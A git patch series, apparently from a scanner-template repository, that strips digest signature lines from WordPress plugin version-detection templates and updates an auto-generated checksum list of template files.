b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 36cb435af3..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f02176901958e85724e7f21a4bbbe62e363300d0b0b89344fd030d0154594a3022100bfeaea7efd2dd4bfd8847897193ce8ea250b0dbd8d7063347024d7cf9d41a013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 2a364356b9..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220659276ec788c9487a2c64ee64f2ead887688302f8997525984701a24e45b58e70221008912164b3742d5aaeaf5461867c4c16da46e157e449ab7f51a769033b2060e36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 5b6dc5a1a8..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bbebf48abbd2e42e42f6b14f99f1fa2311af2f1a7b4eb580eb271a959d26dd1e022100f60d6e84ce67a3370d2e8260887b00d7978310f824005765e51f704de7410d7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index edc58eeb76..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1c782bcf01ac8306b14e1e0602932a77e2a842c8d8e7945133b3687dc924585022100dbd61246baf1b0b6cf4c673b944fb46b383c10eb9b89c2bf38f54726c16f75d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 9404df5732..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ca13d791d358e167bd5ebbd39f7fb26d9b54725c30ee8e9a97e879b79f6685002200e55304349eb39311b35e3ed3aa9c5e195ca13d40a15d0aaec6fe87d330e7834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 2d0d204897..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1b1641acb02bb1ac54fcfaa82e4327d7898ddee99d25f979a9a1707e4aa7132022100b59a8d0d67ad0a889bb4b5ae3051c0bb6738dd79bd363527a6cd87dd0faed137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 96a438307c..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac585f6c21ff9c12d49ce2908b8490c1ce5b45b55b103373162e45344114d02b022100bfa75d0e6967250df0371b9333f6a0dc95fd74c165c2f9113b53e94c8b918726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 2797670063..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f393541905601a6fdf8fb888a6e58cb45a023c91f7274db3356ba75d2960ae1802210085604e0a51d086ecb957ca1f5181af9a98680f58f933ddff0f73b34ee65a2780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 42da67eb97..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8b373ad02218d85a296d310cec61d6906c7363b3482c278b928878a2eb388170221008d2375377c1879b63b25f4d99c91d1607bc1d535d77ff06ad27211cafabd40e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4f14f4bf7f..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d2dc699ceb77dd146d3c17a9fa9ce85c7a983e53d606aae7738b93fbb9eb5d0022100e5eb31688b3eb00b9575c728129042b11aa4cd0798b07890137202d96befdef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index b58673eb82..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1adbd6ced8dc57477f9d0cda6059f6efdcdc45a3397c1a27eedf5c7d258dc880220391244e7fca2ee94943810d5e13345bfbe986b6f3fd713d7efe1be64b4286f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 933c9bd067..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100abb27f05376d32e290acaff846ab8d3d470477247e519c787768131378dd5fef02205aac599452afeb876485b50601c30d840b916a5fc993f5aa1e7be9565c313938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index a46e6a2a3c..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fde325990b360b80f1bda80f1c52459652ccec2d9bb09cfaff1d5075749e1dc102201ae878327f801fe1372f8b88afa0bf6f97dcf5dda17cc037c6a1f6db6d719803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85b91cf1c6..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061dfe63143e2ecdedb141c9e8b21f1319f3d8c61755ef1e4b379d775c87d8169022100ef5650ffc61390f8c331195f70695e8e0971b1d5e0d67e9a66f4765eed60f674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 6a0548b769..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afb4ae544e8622516531113528113922c436bdeb4d6e053eea64f7bb84a1879b02201524b2d98c97f16b94ddb12bb4d260eb92cf5906db22075689f09af5c3492288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index ff9c58d679..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098827f65bc604db45535874637f804f95afa5c2ebb8603b451b3cadb71f9c1f9022100c3c523411e93996ac6e610778163537093d87f04b64229ea9fedcdb0df58f91d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 6e31039967..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220645809b198d0a4a4c0331fc242ce9ab0432fc57dae883fc6de2708dc3b0301c4022100d6743a9b918b67679ac313c45f3cdd3755da2d624c999b9d5b2b0226c1b729df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 456f936bb8..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022010a9c126f845781f0116f7a307cb9f63e2f5d746efe54d3811163f5255aa974d02201a536b3528d53af3724d7e2286e7081fe7bf347f418708b167e84894c33025a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 3f00286196..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c72597497e4c970a9c729158e7bc065d10c8b965b12d4901b94c84f0424e41102205bbf40a74d6cb6db9040aa4a22bd593b9530d9ef8c50ec22f5b4644119a2dd05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 6c60d8936b..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012c9166599bd1f6f90b16db030d2351b9f791d15e4c869c6283933a3bab3db40022014c365e801dff38af262094c9d847d969b5ce5411dff70865dc1028abc96f66a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index e775300b03..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201da9dc217962d5fc8f31377c45f9139d3a202fa5f3a7e8178a5ce46121c278ea022100b8375970cc28757a6a916036ac03ec67f49670e100ff3d052c934c494fdc6a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index ef3bc63110..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203834d4d98ac5c02dfadf14a03a3a7f5fdbc0531268d4ad2c0b5a283fce0cbbb002200134b0b9c8dc829ddea0816729ecf31c6d85bc78253ec827b27a5debe5995ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 6e8ff9895e..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009860c6b139b6597f19c969b1eec8def8d0b04d5717f9edd170a9cc74272fe36402202edffa60e66b4384c8a842ff265ca305e0747c896a3cb12e4de3dca81965f70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index d75aa76307..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cffaa264cc22fe096a5aee765286f9a34943580c398f9119539ab6adf87c1868022100c6f8674ab24a58293e92daa08aa14a089c2d9cbf37de250bbe776dc967c5d0a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index eb2be306c1..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef9a4ee523f01e1b342917fb709f27cc60cf90918017a5fdcf22d202ed34581c022037d76022afb3ef6ea183b567b040db7afad4b8966bb14048d335d72521a77474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 931ca05f93..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6f52d9ed1e542dc2ebf69b9c112735d053673eaa740ef6d01308b71ba73136e022100dcea4bbe996e781c08319a3216ad70715af33843710ce7f4d75ed1b4601d2e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2419f0fcbf..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022063c6bc0c5c55c2cc4163a6648d9c4cf4645ed1449c8741558a224198c0ce653a02203686c3ef41322cb1a64d19d045ff2f2674bac4aff288b190729844a9115c2b57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index c39c219111..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c4d055de959ee8f41d9e0b1f762cea00b7e1cec6aaea38feba4ad4af080a614022100e31980bffcc177f3f61fe76d52f1df92c36480100a88ad8fb751b550bb9459b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 376329e19e..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204bf2b14b84df2b16b644a5443916a9ad285091f983cfa70e131124a21c1284e5022100a16775edf5a4ae2386a03f1fa7d8cd3d5e6cdc690dc8e3f095796a16956f0b17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 73c063f0f0..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220732261d8e5f6702e967cc1d2303b40dfdfa7c11fa98c7e11ab916f8d954c5b950220247df08db727eb68cc4587c499f3b1abf7c232dc7af5efe6ba5f61a2d0df376b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index de812ae324..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007506a6478c0b549e93d16029b6f111340f2ab0b2d190719e2e307ae4584dedc0220690940c6e322a4d16648e146748ba6a81d9f5b9246aea229090d3616ad3957af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 55ad22dbc1..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091810e81700df09f400cc9dd3b3ea9ac66777bc0ef384edd3ee950fdc1c8203a02204a8372203022d0f558c677904431c34c5330cc4ca9c519d9974f35e02f6a5f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 51b69d8510..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e929cda5bf584503b56e700d0bcfdefd85cef70c86868353d713e1ec2409f8bc0221009c9b39fdad38c47b371edfb106bba45286bcf2d0cf4591a2ddaa0f1a3bce26d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 3a7a649172..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca01061fcaae7bd13af04b5484e064fcae614183b19d9ace8f93f04b521d0cd9022100bc3c1461580bfadec445774bdb0a93960adbedb3effd2c269edddc08401f363d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index d2534595ef..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220016176d3b155113b504758c76032061b4d9f7e7446423326c860c3030b9d9ea6022100c0402697aab61e3c865a16dde777d503bbf8447fc72478f0007ddc001afe9c7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 88073fb5d5a3ee84d48a14f04b18a925df0b54bd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Jul 2024 05:57:35 +0000 Subject: [PATCH 1459/1841] Auto Generated Templates Checksum [Sat Jul 20 05:57:35 UTC 2024] :robot: --- templates-checksum.txt | 416 ++++++++++++++++++++--------------------- 1 file changed, 208 insertions(+), 208 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4484c65fb3..6a382db9d8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -756,9 +756,9 @@ helpers/wordpress/plugins/breeze.txt:4817cb4528a6e4857fb571db95197ba2033c4fc1 helpers/wordpress/plugins/broken-link-checker.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/chaty.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 -helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f +helpers/wordpress/plugins/classic-editor.txt:a3240fca0b8eb2f46dc3168aa05f2447def6cb09 helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 -helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e +helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:31918ec11813e2a958c673c0624094b8c07c76a0 helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 helpers/wordpress/plugins/cmb2.txt:6f2af731f80db655385d3795034b4b4bdd02a8bf helpers/wordpress/plugins/coblocks.txt:0f766def7495524760bb6627fe20754b1b42201b @@ -828,10 +828,10 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:0378155bec7f85b13304474a2e6dc6c7797689bc helpers/wordpress/plugins/jetpack.txt:60a854f8bf5e45303554786e4d93e54911b7eb31 -helpers/wordpress/plugins/kadence-blocks.txt:ff9c051b520ac807402f74294d9ef63ab68c6b88 +helpers/wordpress/plugins/kadence-blocks.txt:b1a299a05adb09d8c3884ba7ed81e69dd09369d8 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b23093a06a6e8607146c2380c +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4a68a369b09b39005e13232e5dfd62ba1526b55d helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 @@ -1786,7 +1786,7 @@ http/cves/2019/CVE-2019-6340.yaml:579b3ac2d69aab2fc2e9d65d18c010bfd5b9e9dc http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e http/cves/2019/CVE-2019-6799.yaml:b203bd17d30b9d7e352ceca21844491e6f33dea6 http/cves/2019/CVE-2019-6802.yaml:ded913b5a2ab640125f6e866e8b731d04c8b47a4 -http/cves/2019/CVE-2019-7139.yaml:5e44b9de96e89b6b25122d212340b801250eab82 +http/cves/2019/CVE-2019-7139.yaml:4fa2c04134ebb4a0882cffae25c8d6a30d088a7f http/cves/2019/CVE-2019-7192.yaml:666b80bc55b3a523dcfcbdd3b31e22d53888a6f3 http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca @@ -2517,7 +2517,7 @@ http/cves/2021/CVE-2021-46422.yaml:0579fb33431d31ec41b9974a2d5b1dd65e6c2168 http/cves/2021/CVE-2021-46424.yaml:1da936f682827f6a5f3e72d327c1a4b86426e80d http/cves/2021/CVE-2021-46704.yaml:1f7d8ca83c8dcd4beb8ccd8f509c6c2a39390b08 http/cves/2022/CVE-2022-0087.yaml:ab30fa1e96d3eefebcff47dc05be32b1ef1d6467 -http/cves/2022/CVE-2022-0140.yaml:6554d40f8c7351954cd34b2ad57cb0cfcb90db46 +http/cves/2022/CVE-2022-0140.yaml:b42c308dad619f79aee3d76eb6786318b4bc0171 http/cves/2022/CVE-2022-0147.yaml:d50f59648ef62408d211f30339418e1f73546638 http/cves/2022/CVE-2022-0148.yaml:6a2d16cdaa86368c72f3cebd570cf17b9b62884b http/cves/2022/CVE-2022-0149.yaml:af0215192be07e3b138588253c487d2d703af86f @@ -4033,7 +4033,7 @@ http/exposed-panels/extreme-netconfig-ui.yaml:c99540335fbd14e8a832200372e67e9f8a http/exposed-panels/extron-cms-panel.yaml:adbdc23be4107dc614acb0ef6ea20aba3796bec2 http/exposed-panels/ez-publish-panel.yaml:5dc8fa80dca1479e568d4b1cf87563755471e0a0 http/exposed-panels/f-secure-policy-manager.yaml:e759ce79b7869284f9cddab81bfa0da26d08099b -http/exposed-panels/f5-admin-interface.yaml:06ce0e9fbf3ed64d2e550abccd8fa1ba7cea60a4 +http/exposed-panels/f5-admin-interface.yaml:d181319b870b753518de3b50f7ea3ee5e9bde103 http/exposed-panels/falcosidekick-panel.yaml:cefd542269e92b8ee42dffece2d74a668f63ead8 http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee @@ -7305,229 +7305,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:a31c9e2fb29bf2c8ce8b574401319eab37dc825c -http/technologies/wordpress/plugins/add-to-any.yaml:08e9d5c83f6fbdff59660e7bacdc629f51d648de -http/technologies/wordpress/plugins/admin-menu-editor.yaml:047daa5a2d53cffa3e6c60ea91b1d87a52eb1b37 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:277ccfca6531639bddaa1e090df6306a94ec369c -http/technologies/wordpress/plugins/akismet.yaml:2dcc2ed3c33652a97fad557f3c6622ee2444b064 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d 